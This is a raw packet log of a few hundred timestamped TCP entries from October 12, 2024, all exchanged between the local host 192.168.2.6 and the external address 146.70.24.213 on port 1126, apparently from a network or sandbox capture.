Oct 12, 2024 20:30:05.046608925 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.047899008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.047959089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048003912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048012972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048048973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048094034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048103094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048158884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048204899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048214912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048245907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048288107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048300028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048352003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048382044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048394918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048415899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048458099 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048466921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048500061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048536062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048537970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048587084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048619986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048629999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048650026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048681974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048692942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048716068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048748016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048757076 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048782110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048814058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048820019 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048846960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048880100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048887014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048913002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048939943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.048952103 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.048973083 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049005985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049014091 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049038887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049072027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049079895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049104929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049138069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049144983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049170017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049202919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049211025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049237013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049269915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049278975 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049303055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049345016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049349070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.049379110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.049417973 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.133716106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133778095 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133812904 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133846045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133879900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133891106 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.133891106 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.133913994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133949041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.133969069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.133984089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.134031057 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135103941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135195017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135226965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135236979 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135278940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135310888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135317087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135363102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135418892 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135432959 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135468960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135500908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135510921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135535002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135579109 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135586977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135622025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135654926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135663033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135689020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135723114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135755062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135807037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135838985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135848999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135890961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135932922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.135943890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.135999918 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136032104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136042118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136084080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136116028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136130095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136169910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136209011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136219978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136255026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136286020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136292934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136322021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136354923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136363029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136388063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136420965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136425972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136456013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136487961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136495113 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136523008 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136554956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136562109 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136594057 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136622906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136632919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136655092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136687994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136694908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136719942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136751890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136758089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136785030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136817932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136822939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136851072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136883974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136889935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136913061 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136945009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.136955023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.136979103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137011051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137022018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.137044907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137077093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137088060 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.137113094 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137140989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.137160063 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138180971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138214111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138223886 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138247967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138284922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138330936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138365984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138398886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138403893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138449907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138488054 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138504028 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138535976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138595104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138608932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138642073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138674974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138680935 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138709068 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138742924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138746023 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138772964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138804913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138814926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138839006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138871908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138880968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138906956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138937950 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.138942957 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.138972998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.139007092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.139014006 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.139039993 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.139079094 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140481949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140535116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140578985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140588999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140623093 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140664101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140674114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140727043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140768051 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140779018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140829086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140872002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140880108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140913010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140953064 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.140964031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.140995979 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141031027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141036987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141063929 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141119003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141123056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141149044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141194105 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141197920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141232014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141263962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141294003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141297102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141329050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141355038 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141362906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141395092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141416073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141427040 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141459942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141469002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141494036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141525984 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141532898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141560078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141592026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141597033 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141624928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141657114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141665936 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141693115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141725063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141730070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141758919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141789913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141793966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.141824007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.141864061 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.226583958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226635933 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226674080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226708889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226741076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226775885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226774931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.226774931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.226808071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226844072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.226850033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.226896048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.227763891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.227822065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.227857113 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.227911949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.227921963 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.227962971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.227992058 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.227997065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228033066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228056908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228094101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228140116 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228144884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228180885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228229046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228233099 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228270054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228307009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228312016 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228367090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228408098 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228420973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228476048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228517056 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228543997 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228584051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228616953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228622913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228677988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228715897 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228730917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228785992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228817940 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228826046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228852034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228889942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228893042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228924036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228955030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.228962898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.228988886 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229021072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229022980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229054928 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229089022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229094982 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229121923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229154110 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229162931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229187965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229218960 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229228020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229254961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229285002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229294062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229321003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229350090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229367018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229382038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229415894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229423046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229448080 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229481936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229487896 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229513884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229547977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229552031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229578972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229610920 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229629040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.229645014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229675055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.229685068 CEST	49710	1126	192.168.2.6	146.70.24.213
